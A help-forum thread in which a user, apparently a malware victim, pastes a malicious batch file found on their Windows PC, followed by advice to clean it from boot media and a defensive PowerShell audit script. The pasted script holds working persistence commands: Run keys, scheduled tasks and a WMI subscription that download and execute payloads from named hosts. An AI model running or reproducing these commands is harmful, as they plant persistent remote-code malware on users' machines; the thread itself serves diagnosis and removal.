Alexander Tishchenko, 2021-09-12 11:43:50
Windows

Where does this task come from?

Hello. For the second day now I can't work at all. I don't think I installed anything, but a window keeps popping up with the message "Cannot find C:\ProgramData\temp\rtx.exe".
I went into the folder C:\ProgramData\temp\ and there is a 1start.bat file with the following content:
"reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i: js.webpublicservices.org:280/v1.sct scrobj.dll" / f
reg add "HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i: js.ha7455h6fi1.net:280/v1.sct scrobj.dll" / f
reg delete HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run /v "Realtek HD Audio"

schtasks /create /tn "AdobeUpdateFlac" /tr "cmd /c echo open ftp.ha7455h6fi1.net>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get b.rar c:\windows\Adobeupdate.exe>>s&echo bye>>s&ftp -s:s&c:\windows\Adobeupdate.exe" /ru "system" /sc onstart /F
schtasks /create /tn "AdobeUpdateFlac2" /tr "cmd /c echo open ftp.ha7455h6fi1.net>ps&echo test >>ps&echo 1433>>ps&echo get c.rar c:\windows\help\AdobeFlac.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\AdobeFlac.exe" /ru "system" /sc onstart /F

schtasks /create /tn "OSUpdate" /tr "cmd /c echo open ftp.webpublicservices.org>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe" /ru "system" /sc onstart /F
I deleted this via regedit. Removed the tasks from Task Scheduler. It seemed to help. I log in today and that window started popping up every 5-10 seconds. What should I do?

wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="adobflac3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 13000 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="adobflac4", CommandLineTemplate="cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(' wmi.geaohgoehagugeh.ru: 8080/power.txt ')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(' ha7455h6fi1.net:8096/power.txt ')||powershell.exe IEX (New-Object system.Net.WebClient). DownloadString(' ha7455h6fi1.net:8204/power.txt ')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString(' wmi.webpublicservices.org:8205/power.txt ')||powershell .exe IEX (New-Object system.Net.WebClient).DownloadString(' ha7455h6fi1.net:8095/power.txt ')||regsvr32 /u /s /i:ha7455h6fi1.net:8204/s.txt scrobj.dll®svr32 /u /s /i: ha7455h6fi1.net:8205/s.txt scrobj.dll®svr32 /u /s /i: wmi.webpublicservices.org:8221/s.txt scrobj.dll®svr32 /u /s /i: ha7455h6fi1.net:8096/s.txtscrobj.dll®svr32 /u /s /i: ha7455h6fi1.net:8095/s.txt scrobj.dll®svr32 /u /s /i: wmi.geaohgoehagugeh.ru:8080/s.txt scrobj.dll&wmic os get /FORMAT:\" http://ha7455h6fi1.net:8220/s.xsl\ ""

cmd /c start wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"adobflac3\"", Consumer= "CommandLineEventConsumer.Name=\"adobflac4\""

taskkill /f /im taskhostw.exe
taskkill /f /im winlogon.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskhostw.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
cacls c:\ProgramData\RealtekHD\winlogon.exe /e /d system
cacls c:\ProgramData\RealtekHD\taskhostw.exe /e /d system
"

1 answer(s)
kalapanga, 2021-09-12
@Sasha_Odesskiy

The problem is that you are trying to clean the system from inside the infected OS. Depending on the "quality" of the malware, this ranges from difficult to impossible. It immediately restores itself. At the very least, disconnect from the network.
You can remove such an infection by hand, but only after booting from some kind of "rescue" flash drive. Or run an antivirus, preferably also from bootable media.
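The posted 1start.bat uses four separate persistence points (Run keys loading a remote .sct via regsvr32/scrobj.dll, SYSTEM scheduled tasks that fetch payloads over ftp, a permanent WMI event subscription, and an IFEO Debugger hijack on taskhostw.exe), so a cleanup has to be checked against all of them. The audit script below is an added example written for this thread, not code from the poster or the answerer; the names, paths and match patterns are taken from the posted script, and the regular expressions used to flag entries are my own choice.

```powershell
# Added example (not from the original post): enumerate the persistence points used by the
# posted 1start.bat so a cleanup can be verified. Run from an elevated PowerShell with the
# network disconnected. Names like "adobflac3"/"AdobeUpdateFlac" and the paths come from the question.
$findings = New-Object System.Collections.Generic.List[object]
function Add-Finding($type, $detail) {
    $findings.Add([pscustomobject]@{ Type = $type; Detail = $detail })
}

# 1. Permanent WMI event subscription: __EventFilter -> CommandLineEventConsumer -> binding
foreach ($cls in '__EventFilter', 'CommandLineEventConsumer', '__FilterToConsumerBinding') {
    Get-CimInstance -Namespace root/subscription -ClassName $cls -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d = $_ | Select-Object Name, Query, CommandLineTemplate, Filter, Consumer | Format-List | Out-String
            Add-Finding "WMI $cls" $d.Trim()
        }
}

# 2. Run keys (native and WOW6432Node views) whose value loads a remote .sct through regsvr32/scrobj.dll
$runKeys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
           'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
foreach ($key in $runKeys) {
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    foreach ($p in ($props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' })) {
        if ($p.Value -match 'regsvr32|scrobj\.dll|\.sct|powershell') {
            Add-Finding "Run value '$($p.Name)' in $key" $p.Value
        }
    }
}

# 3. Scheduled tasks whose action builds an ftp script with echo and runs it (AdobeUpdateFlac*/OSUpdate pattern)
Get-ScheduledTask | ForEach-Object {
    $actionText = ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
    if ($actionText -match 'ftp -s:|cmd /c echo open') { Add-Finding "Task $($_.TaskName)" $actionText }
}

# 4. Image File Execution Options 'Debugger' hijack (the script pointed taskhostw.exe at "ntsd -d")
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
Get-ChildItem -Path $ifeo | ForEach-Object {
    $dbg = (Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue).Debugger
    if ($dbg) { Add-Finding "IFEO Debugger for $($_.PSChildName)" $dbg }
}

# 5. Files and folders the script drops or references
foreach ($path in 'C:\ProgramData\temp\1start.bat', 'C:\ProgramData\RealtekHD',
                  'C:\Windows\Adobeupdate.exe', 'C:\Windows\help\AdobeFlac.exe', 'C:\Windows\update.exe') {
    if (Test-Path -LiteralPath $path) { Add-Finding 'Dropped file' $path }
}
$findings | Format-Table -AutoSize -Wrap
```

When removing the WMI subscription, delete the __FilterToConsumerBinding first, then the consumer and the filter (Remove-CimInstance on each); the answer's point still applies, since a running copy of the malware recreates these entries, so the check is most meaningful after cleaning from boot media.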
